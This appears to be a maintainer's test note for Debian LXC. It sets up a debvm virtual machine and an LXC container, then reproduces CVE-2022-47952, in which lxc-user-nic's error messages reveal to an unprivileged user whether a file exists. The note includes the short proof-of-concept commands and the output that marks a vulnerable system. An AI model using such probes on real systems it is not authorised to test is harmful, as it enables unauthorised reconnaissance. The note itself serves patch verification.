LXC¶
VMs setup¶
This test relies on debvm.
apt-cacher-ng is also running on my host machine. Adjust MIRROR URL if not is your case.
export RELEASE=buster
debvm-create --size=3GB --release=$RELEASE -- http://192.168.122.1:3142/deb.debian.org/debian
debvm-run
LXC¶
From https://wiki.debian.org/LXC:
apt-get install lxc libvirt0 libpam-cgfs bridge-utils uidmap iptables
Enable the lxcbr0 simple bridge:
echo 'USE_LXC_BRIDGE="true"' > /etc/default/lxc-net
systemctl restart lxc
systemctl restart lxc-net
Basic test¶
lxc-create -n test -t debian -- -r buster
lxc-start -n test
lxc-attach -n test
Inside the container:
apt-get update
CVE-2022-47952¶
PoC is described in the patch commit:
mkdir -p /l/h
touch /l/h/t
useradd -m debian
su -l debian
debian@testvm:~$ /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic delete lol lol /l/h/t h h
cmd/lxc_user_nic.c: 1181: main: Failed while opening netns file for "/l/h/t"
If vulnerable, the last command should return:
cmd/lxc_user_nic.c: 1101: main: Path "/l/h/t" does not refer to a network namespace path <---- file exist!
Copyright (C) 2023 Santiago Ruano Rincón